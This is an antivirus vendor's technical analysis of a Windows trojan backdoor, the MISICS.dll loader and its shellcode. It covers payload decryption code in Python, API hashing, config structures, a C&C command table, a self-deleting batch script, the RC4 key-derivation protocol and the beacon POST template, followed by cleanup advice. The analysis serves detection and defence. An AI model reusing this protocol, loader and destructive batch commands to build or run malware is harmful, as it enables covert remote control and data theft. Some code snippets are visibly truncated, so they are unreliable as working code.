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Aggiunto al database dei virus Dr.Web: 2019-08-06

La descrizione è stata aggiunta:

Packer: obfuscated

Compilation date: 19.01.2018 12:54:46

SHA1 hashes:

  • c90ade97ec1c6937aedeced45fd643424889d298 (MISICS.dll)
  • 5b8f28a5986612a41a34cb627864db80b8c4b097 (MISICS.dll.crt)


A multi-functional trojan backdoor for 64-bit Microsoft Windows operating systems. Its main components are the loader and the payload that functions in the computer's RAM. Code obfuscation and two-step payload encryption are used to hide traces of malware presence in the system. The backdoor is designed for establishing an encrypted connection with the C&C server and for unauthorized control over an infected computer.

Operating routine

The loader is a dynamic library with Rundll32Entry and ServiceEntry exported functions. During the infection process, it is installed in directory C:\ProgramData\MISICS\MISICS.dll.

It can be launched as a service using svchost.exe or execute its own code using rundll32.exe. During initialization, it checks which way the process was launched. The trojan restarts using rundll32.exe with the -auto key, in case it was launched differently.

For obfuscation purposes, a large amount of garbage code is used, making it difficult to detect the original instructions. The search for all utilized APIs is performed via the PEB (Process Environment Block) in the kernel32.dll and user32.dll libraries by name, which results in the API address being entered in the function table.

Next, the program loads the <loader name>.crt file into memory, which is an encrypted payload. The first 4 bytes of the file are used to generate the decryption key, and the rest is decrypted. The key is a checksum of the first 4 bytes calculated using the CRC32 algorithm. The initial CRC value is set in the code 0xAC1FD22B. To decrypt each byte of data, the CRC result from the DWORD is calculated, which contains the sequential number of the decrypted byte. The CRC value from the previous step is the initial CRC value for the next calculation.

Decryption algorithm:

import struct
def crc32table():
    s = dict()
    for i in range(0x100):
        x = i
        for j in range(8):
            if x & 1:
                x = ((x >> 1) ^ 0xEDB88320) & 0xffffffff
                x = (x >> 1) & 0xffffffff
        s[i] = x
    return s
table = crc32table()
def crc32(crc, data):
    for i in range(len(data)):
        crc = ((crc >> 8) ^ table[(crc ^ ord(data[i])) & 0xff]) & 0xffffffff
    return crc
def decrypt(data):
    s = ''
    key = crc32(0xAC1FD22B, data[:4])
    j = 0
    for i in range(4, len(data)):
        key = crc32(key, struct.pack('<I', j))
        s += chr((ord(data[i]) - key) & 0xff)
        j += 1
    return s
if __name__ == '__main__':
    with open('MISICS.dll.crt', 'rb') as f:
        data =
    with open('payload', 'wb') as f:

After decryption, the trojan checks the value of the first DWORD of the decrypted data. If it is not equal to 0x13AB7064, the decryption is considered incomplete.

The 0x318 byte configuration is located at the beginning of the decrypted data, and the payload is located right after it.

#pragma pack(push,1)
struct cfg
  _DWORD sig; // 0x13AB7064
  _DWORD isPE;
  _BYTE payload_entry_func_name[260];
  _BYTE payload_entry_func_arg[260];
  _BYTE payload_exit_func_name[260];
  _DWORD bCreateDllExitEvent;
#pragma pack(pop)

The field of the isPE structure can take the following values:

  • 0 — the payload is a shellcode
  • 1 — the payload is MZPE file (.exe)
  • 2 — the payload is MZPE file (.dll)

If bCreateDllExitEvent is equal to 1, the trojan creates an event signaling the successful completion at the end of operation. The trojan also calls the payload_exit_func_name function of the payload. In the studied sample, the payload is a shellcode.

Debugging strings generated on the stack:

  • "Get Payload File Name.\n"
  • "ServerLoadPayload()\n"
  • "Get Module File Name.\n"
  • "Read Payload File.\n"
  • "Switch to payload directory.\n"
  • "Verify Payload Data.\n"
  • "Decrypt Payload Data.\n"
  • "Load PE.\n"
  • "Create DllExit Event.\n"
  • "Get DllExit Export Function.\n"

Example of creating a rundll32.exe:


Obfuscation is a frequent inclusion of the one-type code that does not affect the performance of the main functions. There is also a lot of meaningless calls added: GetVersion(), SetLastError(), GetLastError(), GetSystemTime(), SystemTimeToFileTime(), OutputDebugString(), and GetTickCount().

Some OutputDebugString calls provide useful debugging information.

Another distinctive feature is the large number of allocations of small memory blocks using the new function with simultaneously release.

#drweb #drweb


The main body of the shellcode and its configuration are encrypted using a simple algorithm based on the XOR operation. Decryption is performed by the part of the shellcode that was previously decrypted by the loader. Decryption algorithm:

import idaapi
k = 0x0c
for i in range(0xbce57):
    k = (k + i) & 0xff
    idaapi.patch_byte(0x25 + i, idaapi.get_byte(0x25 + i) ^ k)

After decryption the shellcode receives control. Similar to the loader, the shellcode searches for all the necessary APIs via the PEB and enters their addresses in the function table. The following algorithm is used to hash the name of the exported function:

ror = lambda val, r_bits, max_bits: \
    ((val & (2**max_bits-1)) >> r_bits%max_bits) | \
    (val << (max_bits-(r_bits%max_bits)) & (2**max_bits-1))
a = 'GetProcAddress\x00'
c = ord(a[0])
for i in range(1,len(a)):
    c = (ord(a[i]) + ror(c, 13, 32)) & 0xffffffff

During the process of searching for the necessary functions, the trojan unpacks the ssleay32.dll and libeay32.dll filles from its body, which are located at the 0xF2 offset in shellcode and are compressed using the zlib library, then manually loads them. After that, the trojan parses the configuration embedded in its body: Bing@Google@Yahoo|;;|1;1;1;1;1;1;1;|00-24;|5; where |1;1;1;1;1;1;1;|00-24;| defines the schedule of communication sessions with C&C server.

The configuration can contain up to 6 addresses of the C&C servers. Each address consists of an address and port separated by a colon.

Then the current date and time are compared with the parameters from the configuration. If the date and time match the configuration parameters, the trojan attempts to connect to one of the C&C servers specified in the configuration over the SSL Protocol. After successful connection, the program collects information about the infected computer:

#pragma pack(push, 1)
struct botinfo
  wchar_t compname[100];
  _BYTE osver;
  _BYTE gotcompname;
  _BYTE isx64arch;
  _BYTE macaddress[6];
  _DWORD ipaddress;
  _BYTE byte10;
  _BYTE iswow64proc;
  _WORD year;
  _WORD month;
  _WORD day;
#pragma pack(pop)

Then it sends information about the infected computer to the server (cmdid == 0x129E, datasize == 0xdd) and checks that the response sent matches cmid == 0x132A. It sends a packet containing cmdid == 0x155B and 3 parameters for each of the 30 possible modules. After that, the malicious program waits for commands from the server. The waiting time is calculated using the formula:

v12 = 60000 * ctx->period;
min = 120000 * ctx->period / 3u;
ticks = ctx->imp->GetTickCount();
ctx->imp->Sleep(ticks % (v12 - min) + min);

where ctx->period is the last number from the configuration. After a pause, the communication process with the server starts again.

The server can send the following commands:

Command ID Description Arguments Answer Answer data
0x1AC3 To maintain the connection no 0x1AC3
0x1C1C To remove itself from the system - - -
0x230E To create a buffer for the payload (shellcode or MZPE file) payload_params structure:
#pragma pack(push,1)
      struct payload_params
        _BYTE type;
        _DWORD index;
        _DWORD dword5;
        _DWORD bufsize;
        _DWORD shellcode_ep;
        _DWORD sig;
      #pragma pack(pop)
0x2873 in case of success 0 (_QWORD size)
0x2D06 in case of failure -
0x294C To copy the payload into prepared buffer Data to be copied 0x2873 Current size of the payload (_QWORD size)
0x2AC8 To launch the payload - 0x2743 0 (_QWORD size)
0x2D06 To release memory for the payload - 0x2D06 -
0x590A To launch file manager Awaits the following structure as an argument
#pragma pack(push,1)
      struct cmdarg
        _BYTE cmdid;
        char s[];
      #pragma pack(pop)
0x3F15 (file manager launch) Structure received from the server, with the length of the second parameter limited to 90 symbols
0x3F15 (file manager launch) -
0x3099 Processing of other commands Awaits the following structure as an argument
#pragma pack(push,1)
      struct cmdarg
        _BYTE cmdid;
        char s[];
      #pragma pack(pop)
0x3F15 (start of command processing) Structure received from the server, with the length of the second parameter limited to 90 symbols
0x3F15 (end of command processing) -

0x2AC8 (Payload launch)

It is used after the 0x230E and 0x294C commands. payload_params->index == 4 parameter is required. Trojan starts a thread in which it performs all the actions. payload_params->sig == 0x7AC9 means that the payload is not encrypted.

If the payload is encrypted, a decryption key is generated: imp->sprintf(rc4_key, "%02x#%02X_5B", BYTE2(payload_params->sig), (unsigned __int8)payload_params->sig);

The key is then expanded to 256 bytes, and the entire buffer is decrypted by the received key.

payload_params->type == 0 means the buffer contains the shellcode, and payload_params - >shellcode_ep specifies the offset in the shellcode to start execution from.

payload_params->type == 1 means the buffer contains an MZPE file. The trojan loads it into memory and passes the code execution to the OEP (Original entry point). Next, the file is checked for export functions; if there are any, the trojan looks for the GetClassObject function and executes it.

Any other value of the payload_params->type parameter leads the program to shut down.

0x590A (File manager launch)

The trojan establishes a new connection with the C&C server, in which it will accept commands from the file manager.

After establishing a connection, the trojan sends a packet with cmdid == 0x3F15 and with data received from the server. The length of the cmdarg->s parameter is limited to 90 symbols. After that, the malware starts a thread in which it waits for the server’s commands over the established connection.

Group Command ID Description Arguments Answer Answer data
To maintain the connection 0x1AC3 To maintain the connection - 0x1AC3 -
To read a file 0x55C3 To get file size fsread structure:
#pragma pack(push,1)
      struct fsread
        _DWORD pos_high;
        _DWORD pos_low;
        wchar_t filename[400];
      #pragma pack(pop)
0x5DE4 if the file could not be opened -
0x5DDA if the file was opened File size (QWORD type)
0x55C4 To read a file (used after 0x55C3 command) - 0x5DDC if the offset in the file is greater or equal to the file size -
0x5DDB sending file data file data in blocks of 0x1800 bytes
Any code except of 0x5013 after 0x55C4 Error - 0x5DE4 error -
0x5013 To close a file - - -
To write a file 0x55C7 To open a file for reading and writing File name (wchar_t[400]) 0x5DE4 if the file could not be opened -
0x5DDA if the file was opened File size (QWORD type)
0x55C8 To write data to a file Data to be written 0x5DE2 file writing completed -
Any code except 0x5013 or 0x55C9 after 0x55C8 Error - 0x5DE4 error -
0x55C9 End of writing - 0x5DE3 confirming the end of writing -
0x5013 To close a file - - -
To list a directory 0x55C5 To list a directory (wchar_t[400]) path 0x5DDD beginning of directory listing -
- Is ignored, listing stops only when all files and sub-directories are listed or an error occurs - 0x5DDE To list a directory, excluding folders

If the packet size with the next file exceeds the maximum packet size (0x2000 bytes), then the trojan sends the current packet and starts preparing a new one.

After browsing all the files, the trojan recursively proceeds through all the directories, forming a listing for each.

The listing:
#pragma pack(push,1)
      struct fsfileinfo
        wchar_t filename[];
        _QWORD filesize
      struct fslsfiles
        fsfileinfo files[];
      #pragma pack(pop)
- - - 0x5DDF directory listing successfully completed -
0x5DE0 directory listing failed with an error -

0x3099 (other commands)

The malware checks whether the fir pipe was created for the command ID specified by the server. If not, it starts the thread in which it then launches the payload (similar to the 0x2AC8 command).

The trojan establishes a new connection with the C&C server, in which it will accept commands related to 0x2AC8. After establishing a connection, the trojan sends a packet with cmdid == 0x3F15 and with data received from the server. The length of the cmdarg->s parameter is limited to 90 symbols. After that, the malware starts a thread in which it waits for the server’s commands over the established connection.

If the fir pipe is created, the trojan sends the 0x32E0 packet without parameters, then sends the 0x3F15 packet without it as well. After that, it finishes processing the command.

Creates 3 pipes:

  • \\.\pipe\windows@#%02XMon
  • \\.\pipe\windows@#%02Xfir
  • \\.\pipe\windows@#%02Xsec

where %02X is replaced with a number passed by the server.

In a separate thread it reads data from the fir pipe and sends it to the server with the 0x34A7 command ID.

Next, the trojan starts another thread that directly processes the server’s commands:

  • 0x1AC3 — to maintain the connection;
  • 0x3167 — writes the data received from the server to the sec pipe;
  • 0x32E0 — writes the 0x32E0 command to the Mon pipe;
  • 0x38AF — writes the 0x38AF command to the Mon pipe and then closes the connection with the server;
  • 0x3716 — writes 12 bytes received from the server, as well as a pointer to the buffer with the payload, payload’s size and offset to the shellcode entry point to the sec pipe;
  • 0x3A0B — similar to 0x3099;
  • 0x3CD0 — starts the proxy.

0x3CD0 (Proxy)

When receiving the 0x3099 command in the framework for processing the 0x590A command, the trojan tries to open port 127[.]0.0[.]1:5000. If it fails, it increases the port number by one and tries again until the port is opened. Then it writes 3 bytes to the second pipe: 1 byte of the argument and 2 bytes are the open port.

It starts a thread in which it waits for incoming connections. Once the connection is established, it transfers data from the socket to the C&C server and back. When sending data to the C&C server, cmdid is set to 0x9F37.

0x1C1C (Self-removing)

The program attempts to terminate its process via taskkill /f /pid <pid>. . It copies cmd.exe to the %ALLUSERSPROFILE%\\\\dllhost.exe directory (for Windows XP — %ALLUSERSPROFILE%\\Application Data\\\\dllhost.exe). For later Windows versions, it also copies %WINDIR%\\System32\\\\cmd.exe.mui to %ALLUSERSPROFILE%\\\\dllhost.exe.mui, where is the name of the default locale.

It creates in the %ALLUSERSPROFILE%\\\\ directory (for Windows XP) a %ALLUSERSPROFILE%\\Application Data\\\\) mshelp.bat file that contains the following set of commands:

sc stop misics
  sc delete misics
  rd /s /q  "%ALLUSERSPROFILE%\\Misics"
  rd /s /q  "%ALLUSERSPROFILE%\\Media"
  taskkill /f /pid <curpid>
  rd /s /q  "%HOMEDRIVE%\\DOCUME~1\\ALLUSE~1\\APPLIC~1\\Misics"
  rd /s /q  "%HOMEDRIVE%\\DOCUME~1\\ALLUSE~1\\APPLIC~1\\Media"
  reg delete "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" /v "Misics" /f
  del %0
where <curpid> is the trojan’s PID.

Then it launches the batch file and shuts down.

Protocol for communicating with the C&C server

Data is encrypted before being sent to the sever. First, an RC4 key is generated to encrypt the packet header:

  1. A packet header consisting of 8 DWORDs is generated:

    imp->memset(header, 0i64, 32i64);
    header[4] = 0xE0B2;  //signature
    header[5] = cmdid;
    header[3] = datasize;
    header[0] = datasize + imp->GetTickCount() % 0x87C9;
    header[1] = datasize + imp->GetTickCount() % 0x3F0D;
    header[2] = datasize + imp->GetTickCount() % 0x9B34;
    header[7] = datasize + imp->GetTickCount() % 0xF317;
  2. Based on the header[7] value, key_part_2 is generated, consisting of 4 bytes:

    key_part_2[3] = LOBYTE(header[7]) & 0x7A;
    key_part_2[2] = BYTE2(header[7]) ^ 0x81;
    key_part_2[1] = BYTE1(header[7]) ^ 0x4E;
    key_part_2[0] = HIBYTE(header[7]) & 0x3D;
  3. Based on the header[7] value, key_part_3 is generated, consisting of 4 bytes:

    key_part_3[2] = BYTE2(header[7]) & 0xA6;
    key_part_3[3] = LOBYTE(header[7]) ^ 0x6F;
    key_part_3[1] = BYTE1(header[7]) ^ 0x86;
    key_part_3[0] = HIBYTE(header[7]) & 0xE4;
  4. 4) Based on the received header[7], key_part_2, key_part_3, the trojan generates a string that is a short key for encrypting the header:

    z = 0;
    for ( i = 0i64; i < 4; ++i )
      imp_->sprintf(&rc4_key[z], "%02X", *((unsigned __int8 *)&header[7] + i));
      z += 2;
      imp_->sprintf(&rc4_key[z], "%02x", key_part_2[i]);
      z += 2;
      imp_->sprintf(&rc4_key[z], "%02X", key_part_3[i]);
      z += 2;
  5. The obtained short key is expanded to a 256-byte key, which is used for encryption by the RC4 algorithm:

    p_rc4_key = &rc4_key[1];
      p_rc4_key += 2;
      v28 = x % short_key_len;
      v29 = x + 1;
      x += 2;
      *(p_rc4_key - 3) = short_key[v28];
      *(p_rc4_key - 2) = short_key[v29 % short_key_len];
    while ( x < 256 );
  6. The received RC4 key is used to encrypt the header (32 bytes).

    Next, an RC4 key is generated to encrypt the packet data:

    1. key_part_4 is formed (4 bytes):

      imp->memcpy(key_part_4, (char *)&header[3], 4i64);
      key_part_4[2] = key_part_4[1] & 0x89;
      key_part_4[1] = key_part_4[1] & 0x89 ^ 0x60;
      key_part_4[3] = key_part_4[0] ^ 0xAC;
      key_part_4[0] = (key_part_4[0] ^ 0xAC) & 0xCD;
    2. key_part_5 is formed (4 bytes):

      imp->memcpy(key_part_5, (char *)&header[5], 4i64);
      key_part_5[3] = key_part_5[0] & 0xB0;
      key_part_5[0] = key_part_5[0] & 0xB0 ^ 0xD1;
      key_part_5[2] = key_part_5[1] ^ 0x8D;
      key_part_5[1] = (key_part_5[1] ^ 0x8D) & 0x64;
    3. key_part_6 is formed (4 bytes):

      imp->memcpy(key_part_6, (char *)&header[4], 4i64);
      key_part_6[3] = key_part_6[0] & 0xB4;
      key_part_6[0] &= 0x94u;
      key_part_6[2] = key_part_6[1] ^ 0x91;
      key_part_6[1] ^= 0xF9u;
    4. key_part_7 is formed (4 bytes):

      imp->memcpy(key_part_7, (char *)&header[2], 4i64);
      key_part_7[3] = key_part_7[0] & 0x8A;
      key_part_7[0] &= 0x82u;
      key_part_7[2] = key_part_7[1] ^ 0xB2;
      key_part_7[1] ^= 0xD8u;
    5. A short key is generated, which will be further used for data encryption:

      c = 0
        for ( k = 0i64; k < 4; ++k )
          imp->sprintf(&rc4_key_final[c], "%02X", key_part_4[k]);
          c += 2;
          imp->sprintf(&rc4_key_final[c], "%02x", key_part_5[k]);
      c += 2;
          imp->sprintf(&rc4_key_final[c], "%02X", key_part_6[k]);
          c += 2;
          imp->sprintf(&rc4_key_final[c], "%02x", key_part_7[k]);
          c += 2;
    6. The obtained short key is expanded to a 256-byte key, which is used for encryption by the RC4 algorithm:

The trojan sends a POST request:

    "POST http://%s/updates.php?0x%08x HTTP/1.1\r\n"
    "Host: %s\r\n"
    "Connection: Keep-Alive\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Cache-Control: no-catch\r\n"
    "Content-Length: %d\r\n"
    datasize + 32i64);

The ctx->tick parameter changes after each request and is equal to GetTickCount() % 0xFFFFFFFE.

Data encoded by the RC4 algorithm with key_part_1 (32 bytes) written at the beginning is used as request data.

When receiving a packet, the response headers are skipped, and only the \r\n\r\n string is checked. The trojan reads the header (the first 32 bytes), and then proceeds with response decrypting.

  1. Based on the header[7] value, key_part_2 is generated, consisting of 4 bytes:

    key_part_2[3] = LOBYTE(header[7]) & 0x7A;
    key_part_2[2] = BYTE2(header[7]) ^ 0x81;
    key_part_2[1] = BYTE1(header[7]) ^ 0x4E;
    key_part_2[0] = HIBYTE(header[7]) & 0x3D;
  2. Based on the key_part_1[7] value, key_part_3 is generated, consisting of 4 bytes:

    key_part_3[2] = BYTE2(header[7]) & 0xA6;
    key_part_3[3] = LOBYTE(header[7]) ^ 0x6F;
    key_part_3[1] = BYTE1(header[7]) ^ 0x86;
    key_part_3[0] = HIBYTE(header[7]) & 0xE4;
  3. 4) Based on the received header[7], key_part_2, key_part_3, the trojan generates a string that is a short key for encrypting the header:

    z = 0;
    for ( i = 0i64; i < 4; ++i )
      imp_->sprintf(&rc4_key[z], "%02X", *((unsigned __int8 *)&key_part_1[7] + i));
      z += 2;
      imp_->sprintf(&rc4_key[z], "%02x", key_part_2[i]);
      z += 2;
      imp_->sprintf(&rc4_key[z], "%02X", key_part_3[i]);
      z += 2;
  4. key_part_4 is formed (4 bytes):

    imp->memcpy(key_part_4, (char *)&header[3], 4i64);
    key_part_4[2] = key_part_4[1] & 0x89;
    key_part_4[1] = key_part_4[1] & 0x89 ^ 0x60;
    key_part_4[3] = key_part_4[0] ^ 0xAC;
    key_part_4[0] = (key_part_4[0] ^ 0xAC) & 0xCD;
  5. key_part_5 is formed (4 bytes):

    imp->memcpy(key_part_5, (char *)&header[5], 4i64);
    key_part_5[3] = key_part_5[0] & 0xB0;
    key_part_5[0] = key_part_5[0] & 0xB0 ^ 0xD1;
    key_part_5[2] = key_part_5[1] ^ 0x8D;
    key_part_5[1] = (key_part_5[1] ^ 0x8D) & 0x64;
  6. key_part_6 is formed (4 bytes):

    imp->memcpy(key_part_6, (char *)&header[4], 4i64);
    key_part_6[3] = key_part_6[0] & 0xB4;
    key_part_6[0] &= 0x94u;
    key_part_6[2] = key_part_6[1] ^ 0x91;
    key_part_6[1] ^= 0xF9u;
  7. key_part_7 is formed (4 bytes):

    imp->memcpy(key_part_7, (char *)&header[2], 4i64);
    key_part_7[3] = key_part_7[0] & 0x8A;
    key_part_7[0] &= 0x82u;
    key_part_7[2] = key_part_7[1] ^ 0xB2;
    key_part_7[1] ^= 0xD8u;
  8. Based on the received key_part_4, key_part_5, key_part_6, key_part_7, the trojan generates a string that is a short key for decrypting the payload:

    z = 0;
    for ( j = 0i64; j < 4; ++j )
      imp_->sprintf(&payload_rc4_key[z], "%02X", key_part_4[j]);
      z += 2;
      imp_->sprintf(&payload_rc4_key[z], "%02x", key_part_5[j]);
      z += 2;
      imp_->sprintf(&payload_rc4_key[z], "%02X", key_part_6[j]);
      z += 2;
      imp_->sprintf(&payload_rc4_key[z], "%02x", key_part_7[j]);
      z += 2;
  9. Decrypts header with the key generated in step №3 and expanded to 256 bytes;
  10. Checks that header[4] is equal to 0xE0B2;
  11. header[5] contains the command ID and header[3] contains the payload size;
  12. Receives the payload and decrypts it with the RC4 key obtained in step №8 and expanded to 256 bytes.

Curing recommendations

  1. If the operating system (OS) can be loaded (either normally or in safe mode), download Dr.Web Security Space and run a full scan of your computer and removable media you use. More about Dr.Web Security Space.
  2. If you cannot boot the OS, change the BIOS settings to boot your system from a CD or USB drive. Download the image of the emergency system repair disk Dr.Web® LiveDisk , mount it on a USB drive or burn it to a CD/DVD. After booting up with this media, run a full scan and cure all the detected threats.
Download Dr.Web

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Use Dr.Web Anti-virus for macOS to run a full scan of your Mac.

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Download Dr.Web

Download by serial number

  1. If the mobile device is operating normally, download and install Dr.Web for Android. Run a full system scan and follow recommendations to neutralize the detected threats.
  2. If the mobile device has been locked by Android.Locker ransomware (the message on the screen tells you that you have broken some law or demands a set ransom amount; or you will see some other announcement that prevents you from using the handheld normally), do the following:
    • Load your smartphone or tablet in the safe mode (depending on the operating system version and specifications of the particular mobile device involved, this procedure can be performed in various ways; seek clarification from the user guide that was shipped with the device, or contact its manufacturer);
    • Once you have activated safe mode, install the Dr.Web for Android onto the infected handheld and run a full scan of the system; follow the steps recommended for neutralizing the threats that have been detected;
    • Switch off your device and turn it on as normal.

Find out more about Dr.Web for Android